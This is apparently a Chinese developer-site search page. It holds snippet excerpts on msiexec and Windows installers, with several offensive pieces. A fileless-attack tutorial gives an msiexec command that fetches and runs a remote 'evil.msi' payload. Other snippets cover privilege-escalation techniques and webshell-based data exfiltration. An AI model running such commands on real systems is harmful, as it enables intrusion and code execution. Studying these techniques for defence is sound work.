首页
学习
活动
专区
工具
TVP
发布
精选内容/技术社群/优惠产品,尽在小程序
立即前往

内网渗透基石篇--权限提升

管理员凭证配置错误 服务配置错误 故意削弱安全措施 用户权限过高 系统服务权限配置错误 windows系统服务文件在操作系统启动加载执行,并在后台调用可执行文件。...windows install通过msiexec.exe安装MSI文件,双击MSI文件就会运行msiexec.exe。...四、 可信任服务路径漏洞 利用了windows文件路径解析特性,如果一个服务调用执行文件没有正确处理所引用完整路径名,这个漏洞就会被攻击者用来上传任意可执行文件。...,也不是可运行程序 或批处理文件。...Sysvol文件夹是安装AD创建,它用来存放GPO、Script等信息。同时,存放在Sysvol文件夹信息,会复制到域中所有DC上。

1.6K60

Visual Studio Installer打包安装项目VS2015

“用户‘程序’菜单”即"User's Programs Menu"表示:应用程序安装完,用户“开始菜单”显示内容,一般在这个文件夹,需要再创建一个文件用来存放:应用程序.exe和卸载程序.exe...添加后,一般它会自动把exe程序所需依赖项也加进来,各种dll文件,在右侧“Detected Dependencies”里面可以看到它自动导入了哪些依赖项,方便你检查是否有遗漏 ?...然后,侧框框里会出现一个快捷方式项,将它剪切,粘贴到“用户桌面”文件夹下 ? 至于快捷方式名称、图标、描述等其他属性,可以在属性面板设置,如下 ?...第四步,添加卸载程序 既然有安装就有卸载,卸载程序其实是一个Windows操作系统自带程序(C:Windows\System32\Msiexec.exe),只不过是通过给它传特殊参数命令,来让它执行卸载...添加和设置卸载程序操作如下: 首先,将卸载程序放在“应用程序文件夹”目录下,右键“应用程序文件夹”,添加——文件,在系统盘下找到这个路径文件——C:Windows\System32\Msiexec.exe

1.4K31
您找到你想要的搜索结果了吗?
是的
没有找到

常用软件静默安装参数,双击自动安装

Pack补丁包用 /extract 解压; ACDSee10 /a 解压 不支持自带参数解压可以用 WinRAR 或 7-ZIP 解压,直接提取安装文件执行静默安装。...还可以改软件配置文件执行静默安装 :Total Commander:用 WinRAR 解压出来,修改 install.inf auto=1 即可自动安装。 6....二、常用软件静默参数 个人感觉 InstallShield 封装执行静默安装不太稳定,有时会莫名安装失败,也比较占用资源。其它格式都还可以。...运行原始安装光盘下 Setup.exe /a,然后输入序列号,选择一个文件夹作为office安装点。...Adobe PDF Reader v9.1.exe /sAll Adobe Acrobat X Pro v10.1.0 解压出来,得到msi文件msiexec.exe /i AcroPro.msi /

13.3K31

何在 Windows 10上创建和运行批处理文件

何在 Windows 10上创建批处理文件 创建批处理(脚本或批处理脚本)文件过程很简单。你只需要一个文本编辑器和一些基本命令行知识。...如何在 Windows 10 上运行批处理文件Windows 10 上,你至少可以用三种方式运行批处理文件。你可以使用文件资源管理器或命令提示符按需运行它。...提示: 在 Windows 10,任务计划程序允许您从不同触发器中进行选择,包括特定日期、启动过程,或者当用户登录到设备。...启动时运行批处理文件 如果你希望每次登录到 Windows 10 帐户执行一系列命令,你可以将脚本放在启动文件夹以保存额外步骤,而不是使用任务计划程序。...(或单击粘贴快捷方式以创建批处理文件快捷方式。) 重启电脑 完成这些步骤后,每次登录到 Windows 10批处理文件执行并运行所包含命令

25.5K40

文件落地攻击

msiexec msiexec.exe属于系统进程,是Windows Installer一部分,用于安装Windows Installer安装包(MSI),对系统正常运行非常重要,一般在运行Microsoft...Step 4:在目标主机执行以下命令实现无文件落地执行载荷 msiexec /q /i http://192.168.174.129:1234/evil.msi ?...\system32文件夹下,2000系统regsvr32.exe在winnt\system32文件夹下,我们可以通过该命令来实现无文件落地攻击,和上面类似这里也借助JSRat来实现,首先我们在本地运行...文末小结 无文件落地攻击方法与技巧多种多样,自然不局限与上面的几种,当然有时候如果要真的提高自身隐匿程度以及实现免杀等技术可以结合白名单以及一些Windows系统应用文件特性,例如通过Windows...Defender自带命令执行工具"MpCmdRun.exe"来实现远程下载恶意文件执行达到CS上线目的,更多方法与技巧尽在探索......

1.9K40

Exploit Leads to Data Exfiltration

访问和手动键盘访问从网络泄露出去 这些文件对业务及其合作伙伴至关重要,而且所窃取这些文件是有选择,就好像攻击者在寻找特定材料,当要渗透某些文件文件夹,一个最重要文件夹被渗透,同时传递其他合作伙伴文件夹文件...MSI edita 1 = as dasd/qn 运行此命令Support Center Plus运行路径是: C:\Program Files\ManageEngine\SupportCenterPlus...,在webshell创建几分钟前命名为相同东西,在该文件执行似乎失败后威胁参与者从上面上传了msiexec.exe文件,该文件在几秒钟后创建了webshell 这两个msiexec文件包含相同...路径m:\work\shellll\和.NET版本不同 应用日志 我们可以从Catalina.txt日志中看到当威胁参与者运行fxs.bat(RDP隧道)等特定命令,应用程序认为进程被挂起(运行30...msiexec.exe二进制文件到系统上,这个二进制文件不是合法微软msiexec.exe,而是一个包含嵌入式编码web shell下载程序,该可执行文件命名具有融入环境并看起来合法好处,同时对利用

92630

powershell自动化重装 cloudbase-init 为1.1.2版本

裸金属windows不要轻易动cloudbase-init 看下这篇文档,裸金属之外Windows CVM重置密码有问题,基本都能通过这篇文档解决,底层命令被破坏得太厉害,建议备份数据重装系统,没必要在...打头DNS, 183.60.82.98 183.60.83.19 就不用执行下面2句命令,如果机器有公网,也不需要执行) cmd.exe /c "echo 169.254.0.47 windows-1251783334...\SysWOW64\certutil.exe,同时在执行如下代码还需退出所有会话里第三方安全软件(比如当前会话里360你退出了,但其他会话里有360,你在当前会话里执行代码还是会被360拦截)...','c:\7z2200-x64.msi') msiexec.exe /i c:\7z2200-x64.msi /qn Start-Sleep 30 del c:\7z2200-x64.msi 2>$...','c:\7z2200-x64.msi') msiexec.exe /i c:\7z2200-x64.msi /qn Start-Sleep 30 del c:\7z2200-x64.msi 2>$

1.8K40

绝对干货:自定义msi安装包执行过程

有时候我们需要在程序执行另一个程序安装,这就需要我们去自定义msi安装包执行过程。 比如我要做一个安装管理程序,可以根据用户选择安装不同子产品。...平时使用msiexec.exe习惯了,所以最直接想法就是在一个子进程执行:     msiexec.exe /qn 这样固然是能够完成任务,但是不是太简陋了?...或者通过它传递我们消息给msi,比如说告诉msi,停止安装,执行cancel操作。使用这个方法需要注意是,当你完成安装后一定要把原来handler设回去。否则以后执行msi安装包可能会出问题。...在安装进行过程可以把cancel信息传递给MsiProgressHandler,当MsiProgressHandler检测到cancel信息后通过返回值告诉msi执行引擎,执行cancel操作(msi...总结一下,通过调用几个windows API,我们可以实现对msi安装过程控制。这比调用msiexec.exe更灵活,也为程序日后添加新功能打下了基础。

1.9K90

权限提升分析及防御

用户权限过高等 1、系统服务权限配置错误 Windows系统服务文件在操作系统启动加载和执行,并在后台调用可执行文件。...特权安装功能才能有效果 Windows Installer是Windows操作系统组件之一,专门用来管理和配置软件服务,其分为客户端安装服务(Msiexec.exe)和MSI文件两部分。...Windows Installer通过Msiexec.exe安装MSI文件包含程序,双击MSI文件就会运行Msiexec.exe。...产生原因 因为Windows服务通常都是以System权限运行,所以系统在解析服务所对应文件路径空格,也会以系统权限运行 :C:\Program Files\Some Folder\Service.exe...(这里说到是使用计划任务来进行定时执行) 使用方法: //不弹框运行 accesschk.exe /accepteula //这里原书中命令空格被吞了,说是列出某个驱动器下所有权限配置有缺陷文件夹

1.4K20

Windows上安装社区版MongoDB

如要使用命令行(cmd.exe)运行 msiexec.exe进行安装,请参阅 使用msiexec.exe进行安装。 注意 如要安装其他版本MongoDB,请参阅版本文档。...在Version下拉列表,选择最新MongoDB Server 4.0版本。 c. 在OS下拉列表, 应选择Windows 64位X64。 d. 在Package 下拉列表,应选择MSI。...例如,从Windows资源管理器/文件资源管理器: a. 转到下载MongoDB安装程序(.msi文件目录。默认情况下,这是您Downloads目录。 b. 双击该.msi文件。...仅绑定到本地,这些二进制文件只能接受来自同一台计算机上运行客户端连接。远程客户端无法连接到仅绑定到本地二进制文件。有关更多信息(包括如何覆盖和绑定到其他IP地址),请参阅本地绑定兼容性更改。...将MongoDB二进制文件添加到系统 本教程所有命令行示例提供都是MongoDB二进制文件绝对路径。

2.8K40

隔空执行学习总结

1、计算机对于文件类型分辨方式 计算机对于文件分辨方式 文件作用: 告诉系统,把下面的二进制代码,当作什么来执行!!!!!...,这里图片可以正常显示,通过修改后缀可以切换不同解析,换成压缩包后缀可以重新解析为压缩包可以正常打开 ....通过txt来执行木马程序 把haha.txt放到某个web目录里 msi=静默安装包 这里我们假设已经入侵成功需要运行某个软件 默认位置: c:/windows/system32/msiexec.exe...c:/windows/syswow64/msiexec.exe 远程加载木马到电脑上运行 msiexec /q /i http://192.168.119.135/go.txt 成功实现隔空执行...这里我们通过将txt文件存入网站然后在对方电脑中通过msi进行一个静默安装 通过dll执行 msfvenom -p windows/x64/shell/reverse_tcp lhost=[黑客ip]

15720

C2基础建设 - Azure中继

任何不共享配置文件用户代理,URI路径,标头和查询参数传入请求都将被重定向到可配置诱饵网站。验证后C2流量将中继到同一虚拟网络团队服务器,该服务器进一步受到网络安全组限制。...部署 AzureC2Relay是通过terraform azure模块以及一些本地az cli命令部署 确保已安装terraform,az cli和dotnet core 3.1 Windows...\AzureCLI.msi; Start-Process msiexec.exe -Wait -ArgumentList '/I AzureCLI.msi /quiet'; rm ....config.tf以适合您需求 将虚拟“ cobaltstrike-dist.tgz”替换为实际cobaltstrike下载 编辑/替换Ressources文件夹Malleable配置文件(确保配置文件文件名与您在步骤...terraform完成后,它将为您提供所需ssh命令,CobaltStrike团队服务器将在已部署VM上tmux会话运行使用完红外线后,您可以使用 terraform destroy -auto-approve

89020

彻底卸载Office 2016 或 Office 365

1.删除安装包 打开 Office 365 安装文件夹,32位系统通常为 C:\Program Files\ ,64位系统通常为 C:\Program Files (x86)\ 删除安装文件夹,Microsoft...Office 16 或 Microsoft Office 2.删除计划任务 以管理员权限打开命令提示符,该程序通常位于开始菜单>附件 依次执行以下各行命令 schtasks.exe /delete /...,执行: sc delete Clicktorunsvc 5.删除 Office 相关文件 同时按下 Windows 以及 R,打开运行对话框 输入 %ProgramFiles% 并确定,删除 Microsoft...以及 R,打开运行对话框,输入 %ALLUSERSPROFILE%\Microsoft\Windows\Start Menu\Programs 并确定 删除 Microsoft Office 16 文件夹以及相关快捷方式...8.卸载其他组件 以管理员权限打开命令提示符 对于 x64 操作系统上运行 x86 版本 Office 2016,运行: MsiExec.exe /X{90160000-008F-0000-1000-

4.5K10

winform 程序打包成windows安装包

其中,第二个是web项目的安装包,第三个是快速安装项目就类似于平常安装软件快速安装选项,少配置了很多东西,但可能会出现意外情况,酌情使用。...output,右键它,选择第一个创建快捷方式,创建之后快捷方式也是在应用程序文件,在应用程序文件右侧找到将它拖拽到左侧第二个文件夹,也就是安装之后会在桌面生成一个应用快捷图标,便于使用。...同理,我们也可以重复这个步骤,在第三个文件夹添加快捷方式,这样在客户端右下角开始菜单生成一个快速访问方式。...添加卸载程序,选中setup项目,在项目的属性窗口,可以查看到ProductCode属性值,复制该值,接着再次右键应用程序文件夹,Add->文件,打开文件选择管理器,文件选择框 输入c:\windows...\system32\msiexec.exe这个路径,添加文件,在右侧又会多了 msiexec.exe 文件,右键它,创建快捷方式,可以修改该快捷方式名称,可改为Unistall.exe ,又是将该快捷方式拖拽到用户桌面也就是第二个文件夹

17610

图解使用VS安装项目打包程序

添加安装文件 (1)添加项目输出 在文件系统一栏中有三个路径:应用程序文件夹、用户“程序”菜单、用户桌面。 应用程序文件夹和安装目录完全对应;用户“程序”菜单和用户桌面想必不用多解释了吧。...还有一种方法更简单,直接复制、拖拽你想添加资源文件文件夹到应用程序文件夹。 3....添加卸载程序 即在添加你应用程序项目的时候,多添加一个msiexec.exe进去,这个文件在c:\windows\system32文件夹下。...msiexec.exe这个执行文件用于安装Windows Installer安装包(msi格式文件)。 4. 创建快捷方式 4.1....添加快捷方式 右击可执行文件msiexec.exe为它们添加快捷方式。 ? 在快捷方式属性栏,可以在Icon项为其设置一个ico格式图标。 ? 4.2.

1.7K50

bat批处理命令大全_文件批处理命令

大家好,又见面了,我是你们朋友全栈君 批处理文件(batch file)包含一系列 DOS命令,通常用于自动执行重复性任务。用户只需双击批处理文件便可执行任务,而无需重复输入相同指令。...编写批处理文件非常简单,但难点在于确保一切按顺序执行。编写严谨批处理文件可以极大程度地节省时间,在应对重复性工作尤其有效 在Windows善用批处理可以简化很多重复工作 批处理?...在“命令提示”下键入批处理文件名称,或者双击该批处理文件,系统就会调用Cmd.exe运行该批处理程序 一般情况下,每条命令占据一行 当然也可以将多条命令用特定符号(:&、&&、|、||等)分隔后写入同一行...,可以用这个命令行格式查看返回码 默认值为0,一般命令执行出错会设 errorlevel 为1 3 dir 显示文件夹内容 dir #显示当前目录文件和子目录 dir /a #显示当前目录文件和子目录...echo命令查看每个变量值, echo %time% 注意 %time% 精确到毫秒,在批处理需要延时处理可以用到 32 start 批处理调用外部程序命令,否则等外部程序完成后才继续执行剩下指令

3.8K30
领券